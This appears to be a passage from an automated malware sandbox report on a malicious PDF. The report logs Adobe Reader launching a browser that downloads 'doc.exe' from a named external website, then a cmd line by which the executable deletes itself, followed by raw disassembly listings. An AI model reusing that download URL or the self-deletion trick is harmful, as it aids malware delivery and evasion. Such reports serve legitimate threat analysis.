Feb 3, 2018 21:33:26.182827950 CET	92	IN	Data Raw: e5 f7 20 a9 7e c0 31 59 20 c7 43 eb 80 20 4c 97 62 2b 59 59 58 58 20 da 1f 50 b8 20 84 e7 a1 57 59 20 f5 bc 9c b1 20 fd 4b 28 7e 59 61 20 19 51 a2 81 20 80 31 cd 72 59 20 e7 ea 2c 8f 20 c8 4b 77 18 59 61 61 20 25 af 28 9a 20 7c 33 4f 7b 59 20 3f Data Ascii: ~1Y C Lb+YYXX P WY K(~Ya Q 1rY , KwYaa %( \|3O{Y ? EKXX 2 m)a 9d A~gYYaXYYa_c w( >X x~ (aX @ #/a QE <}JaXa \|VY 1u aYX =h #7a 5k ecYaaY c Ca
Feb 3, 2018 21:33:26.183286905 CET	92	IN	Data Raw: 67 cf 19 20 a1 09 c6 3d 61 20 c5 d3 9f 56 20 54 cd b8 67 61 61 61 58 59 20 e0 1e 1b 99 20 df 1e be 49 61 20 e2 6b 44 69 20 0b 1c 81 23 59 61 20 b9 c3 4a a3 20 12 c1 82 6b 59 20 f8 93 b9 01 20 c2 ac d0 01 Data Ascii: g =a V TgaaaXY Ia kDi #Ya J kY

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: AcroRd32.exe PID: 4068 Parent PID: 3460

General

Start time:	21:31:10
Start date:	03/02/2018
Path:	C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe' 'C:\Users\user\Desktop\aaa.pdf'
Imagebase:	0x3d0000
File size:	2172600 bytes
MD5 hash:	C282A6792FB3C2E4CF37082891A5D69C
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: AcroRd32.exe PID: 3036 Parent PID: 4068

General

Start time:	21:31:12
Start date:	03/02/2018
Path:	C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe' --type=renderer /prefetch:1 'C:\Users\user\Desktop\aaa.pdf'
Imagebase:	0x3d0000
File size:	2172600 bytes
MD5 hash:	C282A6792FB3C2E4CF37082891A5D69C
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: RdrCEF.exe PID: 3632 Parent PID: 4068

General

Start time:	21:31:22
Start date:	03/02/2018
Path:	C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --backgroundcolor=16448250
Imagebase:	0xca0000
File size:	1825976 bytes
MD5 hash:	254D4BE8CD7953E7AD7CC37FE82BCF35
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: RdrCEF.exe PID: 2736 Parent PID: 3632

General

Start time:	21:31:23
Start date:	03/02/2018
Path:	C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --disable-3d-apis --disable-databases --disable-direct-npapi-requests --disable-file-system --disable-notifications --disable-shared-workers --lang=en-US --lang=en-US --log-severity=disable --product-version='ReaderServices/15.16.20039 Chrome/45.0.2454.85' --enable-pinch --device-scale-factor=1 --enable-delegated-renderer --num-raster-threads=2 --gpu-rasterization-msaa-sample-count=8 --content-image-texture-target=3553 --video-image-texture-target=3553 --disable-accelerated-video-decode --disable-webrtc-hw-encoding --disable-gpu-compositing --channel='3632.0.1828675925\933854480' --allow-no-sandbox-job --font-cache-shared-handle=1260 /prefetch:673131151
Imagebase:	0xca0000
File size:	1825976 bytes
MD5 hash:	254D4BE8CD7953E7AD7CC37FE82BCF35
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: RdrCEF.exe PID: 3644 Parent PID: 3632

General

Start time:	21:32:08
Start date:	03/02/2018
Path:	C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --disable-3d-apis --disable-databases --disable-direct-npapi-requests --disable-file-system --disable-notifications --disable-shared-workers --lang=en-US --lang=en-US --log-severity=disable --product-version='ReaderServices/15.16.20039 Chrome/45.0.2454.85' --enable-pinch --device-scale-factor=1 --enable-delegated-renderer --num-raster-threads=2 --gpu-rasterization-msaa-sample-count=8 --content-image-texture-target=3553 --video-image-texture-target=3553 --disable-accelerated-video-decode --disable-webrtc-hw-encoding --disable-gpu-compositing --channel='3632.1.1650676039\414440677' --allow-no-sandbox-job --font-cache-shared-handle=1756 /prefetch:673131151
Imagebase:	0xca0000
File size:	1825976 bytes
MD5 hash:	254D4BE8CD7953E7AD7CC37FE82BCF35
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: iexplore.exe PID: 920 Parent PID: 4068

General

Start time:	21:32:26
Start date:	03/02/2018
Path:	C:\Program Files\Internet Explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exe
Imagebase:	0x1380000
File size:	820416 bytes
MD5 hash:	E7CD04555F47651B79A50DBA6148019C
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: iexplore.exe PID: 876 Parent PID: 920

General

Start time:	21:32:28
Start date:	03/02/2018
Path:	C:\Program Files\Internet Explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:920 CREDAT:82945 /prefetch:2
Imagebase:	0x1380000
File size:	820416 bytes
MD5 hash:	E7CD04555F47651B79A50DBA6148019C
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: doc.exe PID: 3440 Parent PID: 920

General

Start time:	21:33:09
Start date:	03/02/2018
Path:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe'
Imagebase:	0x3c0000
File size:	345600 bytes
MD5 hash:	4DA1C29C6D3E91509FBE0D328118257D
Programmed in:	.Net C# or VB.NET
Reputation:	low

Chronological Activities

Analysis Process: doc.exe PID: 1952 Parent PID: 3440

General

Start time:	21:33:18
Start date:	03/02/2018
Path:	C:\Users\user\AppData\Local\Temp\doc\doc.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\AppData\Local\Temp\doc\doc.exe'
Imagebase:	0xe80000
File size:	345600 bytes
MD5 hash:	4DA1C29C6D3E91509FBE0D328118257D
Programmed in:	.Net C# or VB.NET
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 3772 Parent PID: 3440

General

Start time:	21:33:19
Start date:	03/02/2018
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 1000 > Nul & Del 'C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe'
Imagebase:	0x1f0000
File size:	202240 bytes
MD5 hash:	7DB6A5CEEAC1CB15CF78552794B3DB31
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: conhost.exe PID: 568 Parent PID: 3772

General

Start time:	21:33:20
Start date:	03/02/2018
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0x4
Imagebase:	0xad0000
File size:	46080 bytes
MD5 hash:	66CC0EE1A55D150A84EF8D91D18B7C55
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: PING.EXE PID: 1280 Parent PID: 3772

General

Start time:	21:33:21
Start date:	03/02/2018
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping 1.1.1.1 -n 1 -w 1000
Imagebase:	0x1340000
File size:	19456 bytes
MD5 hash:	1CA1179CA1AA9FF17DED960E52794F0A
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: RdrCEF.exe PID: 3644 Parent PID: 3632

Executed Functions

Function 3C13CA16, Relevance: 32.7, Strings: 25, Instructions: 1479

Strings

U&s>, xrefs: 3C13D82A
=+;, xrefs: 3C13DC99
!s>, xrefs: 3C13DA93
=+;, xrefs: 3C13DEB4
1.s>, xrefs: 3C13DC4A
!Y;, xrefs: 3C13D113
L;, xrefs: 3C13D020
q!s>, xrefs: 3C13D52B
U&s>, xrefs: 3C13D818
E*s>, xrefs: 3C13CBD0
N;, xrefs: 3C13D0F1
%!s>, xrefs: 3C13D384
I-s>, xrefs: 3C13DA39
5"s>, xrefs: 3C13DE24
m)s>, xrefs: 3C13CB76
&s>, xrefs: 3C13CA68
Q's>, xrefs: 3C13CA95
)(s>, xrefs: 3C13CAEF
q!s>, xrefs: 3C13D59A
!.s>, xrefs: 3C13DC3F
s>, xrefs: 3C13D2D3
=+;, xrefs: 3C13DD25
]M;, xrefs: 3C13DF94
L;, xrefs: 3C13D102
a,s>, xrefs: 3C13D6D2

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C13F320, Relevance: 14.5, Strings: 11, Instructions: 727

Strings

eis>, xrefs: 3C13F33A
5is>, xrefs: 3C13FDA9
5is>, xrefs: 3C13FDBB
uns>, xrefs: 3C13F5A6
1ms>, xrefs: 3C13F50F
qs>, xrefs: 3C13FA27
Mos>, xrefs: 3C13F610
L;, xrefs: 3C13FB10
Yls>, xrefs: 3C13F4A5
9xs>, xrefs: 3C13FCDF
ks>, xrefs: 3C13F478

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C143E60, Relevance: 8.0, Strings: 6, Instructions: 494

Strings

Iw;, xrefs: 3C143F29
]J;, xrefs: 3C144064
mK;, xrefs: 3C143FF9
`AW, xrefs: 3C143EE0
EK;, xrefs: 3C14401A
]J;, xrefs: 3C14417C

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C147540, Relevance: 5.5, Strings: 4, Instructions: 497

Strings

!Y;, xrefs: 3C14781E
]/;, xrefs: 3C1476E7
]J;, xrefs: 3C14771E
u';, xrefs: 3C147A3C

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C1369C0, Relevance: 4.0, Strings: 3, Instructions: 249

Strings

].;, xrefs: 3C136C07
]/;, xrefs: 3C136C49
0;, xrefs: 3C136C1A

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C136660, Relevance: 4.0, Strings: 3, Instructions: 213

Strings

]/;, xrefs: 3C1366E5
]J;, xrefs: 3C1368E3
]J;, xrefs: 3C13671C

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C145960, Relevance: 2.9, Strings: 2, Instructions: 387

Strings

qJ;, xrefs: 3C145DE5
qJ;, xrefs: 3C1459AA

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C13E020, Relevance: 2.5, Strings: 2, Instructions: 45

Strings

U$s>, xrefs: 3C13E0AD
U$s>, xrefs: 3C13E09B

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C10CF11, Relevance: 1.3, Strings: 1, Instructions: 73

Strings

`e^W, xrefs: 3C10CF24

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C13E840, Relevance: .2, Instructions: 162

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C145780, Relevance: .1, Instructions: 111

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C10CFA0, Relevance: .1, Instructions: 95

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C12E4DA, Relevance: .1, Instructions: 88

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C117F93, Relevance: .1, Instructions: 61

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C136DA0, Relevance: .1, Instructions: 54

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C12C362, Relevance: .0, Instructions: 46

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C10D0C0, Relevance: .0, Instructions: 45

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C117FE0, Relevance: .0, Instructions: 37

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C12C500, Relevance: .0, Instructions: 14

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 00411001, Relevance: .0, Instructions: 9

Memory Dump Source

Source File: 00000005.00000002.1372423440.00411000.00000020.sdmp, Offset: 00411000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_411000_RdrCEF.jbxd

Function 00411090, Relevance: .0, Instructions: 3

Memory Dump Source

Source File: 00000005.00000002.1372423440.00411000.00000020.sdmp, Offset: 00411000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_411000_RdrCEF.jbxd

Function 00411110, Relevance: .0, Instructions: 3

Memory Dump Source

Source File: 00000005.00000002.1372423440.00411000.00000020.sdmp, Offset: 00411000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_411000_RdrCEF.jbxd

Function 00411050, Relevance: .0, Instructions: 3

Memory Dump Source

Source File: 00000005.00000002.1372423440.00411000.00000020.sdmp, Offset: 00411000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_411000_RdrCEF.jbxd

Function 00411310, Relevance: .0, Instructions: 3

Memory Dump Source

Source File: 00000005.00000002.1372423440.00411000.00000020.sdmp, Offset: 00411000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_411000_RdrCEF.jbxd

Non-executed Functions

Function 3C142C60, Relevance: 2.9, Strings: 2, Instructions: 364

Strings

Iw;, xrefs: 3C142CDD
Iw;, xrefs: 3C1430F4

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C10B379, Relevance: 1.5, Strings: 1, Instructions: 263

Strings

`, xrefs: 3C10B385

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C11B98D, Relevance: 1.5, Strings: 1, Instructions: 256

Strings

`, xrefs: 3C11B997

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C10AB8B, Relevance: 1.5, Strings: 1, Instructions: 256

Strings

`, xrefs: 3C10AB95

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C10B047, Relevance: 1.5, Strings: 1, Instructions: 245

Strings

`, xrefs: 3C10B053

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C11B667, Relevance: 1.5, Strings: 1, Instructions: 238

Strings

`, xrefs: 3C11B671

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C10D63B, Relevance: .3, Instructions: 263

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C1157FB, Relevance: .3, Instructions: 263

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C115F11, Relevance: .3, Instructions: 260

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C113DF2, Relevance: .3, Instructions: 259

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C119FB2, Relevance: .3, Instructions: 259

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C1105F2, Relevance: .3, Instructions: 259

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C10E44D, Relevance: .3, Instructions: 256

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C10C84B, Relevance: .3, Instructions: 256

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C10DD4B, Relevance: .3, Instructions: 256

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C1154C5, Relevance: .2, Instructions: 246

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C10D307, Relevance: .2, Instructions: 245

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C115BE7, Relevance: .2, Instructions: 242

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C119C86, Relevance: .2, Instructions: 241

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C113AC6, Relevance: .2, Instructions: 241

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C1102C6, Relevance: .2, Instructions: 241

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C10C527, Relevance: .2, Instructions: 238

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C10DA27, Relevance: .2, Instructions: 238

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C10E127, Relevance: .2, Instructions: 238

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C10EC62, Relevance: .2, Instructions: 227

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C119525, Relevance: .2, Instructions: 227

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C116DC2, Relevance: .2, Instructions: 227

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C11B27D, Relevance: .2, Instructions: 224

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C112158, Relevance: .2, Instructions: 224

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C1132FB, Relevance: .2, Instructions: 224

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C116B46, Relevance: .2, Instructions: 209

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C1192A7, Relevance: .2, Instructions: 209

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C10E9E6, Relevance: .2, Instructions: 209

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C113082, Relevance: .2, Instructions: 207

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C111EE6, Relevance: .2, Instructions: 206

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C11B007, Relevance: .2, Instructions: 206

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C131EC0, Relevance: 12.9, Strings: 10, Instructions: 365

Strings

N;, xrefs: 3C132034
=!;, xrefs: 3C1323A6
N;, xrefs: 3C1322E9
IJ;, xrefs: 3C13218A
IJ;, xrefs: 3C131FEF
!L;, xrefs: 3C132079
!L;, xrefs: 3C1321C2
I;, xrefs: 3C1321DE
=!;, xrefs: 3C132328
N;, xrefs: 3C1321A6

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C135100, Relevance: 10.3, Strings: 8, Instructions: 307

Strings

]J;, xrefs: 3C1353BE
`kW, xrefs: 3C1352C1
IJ;, xrefs: 3C135178
`kW, xrefs: 3C135228
`EpW, xrefs: 3C13539F
IJ;, xrefs: 3C135192
!p;, xrefs: 3C135475
`AW, xrefs: 3C1351EE

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C132DC0, Relevance: 10.3, Strings: 8, Instructions: 292

Strings

IJ;, xrefs: 3C132E51
`AW, xrefs: 3C132EAD
IJ;, xrefs: 3C132E37
]J;, xrefs: 3C13305A
`kW, xrefs: 3C132EE7
!p;, xrefs: 3C133111
`EpW, xrefs: 3C13303B
`kW, xrefs: 3C132F80

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C138780, Relevance: 10.2, Strings: 8, Instructions: 184

Strings

YK;, xrefs: 3C1388E6
EK;, xrefs: 3C138943
-K;, xrefs: 3C138889
yp;, xrefs: 3C1389BC
mK;, xrefs: 3C13891E
yp;, xrefs: 3C138A18
y;, xrefs: 3C13895F
`AW, xrefs: 3C138812

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C137860, Relevance: 9.0, Strings: 7, Instructions: 218

Strings

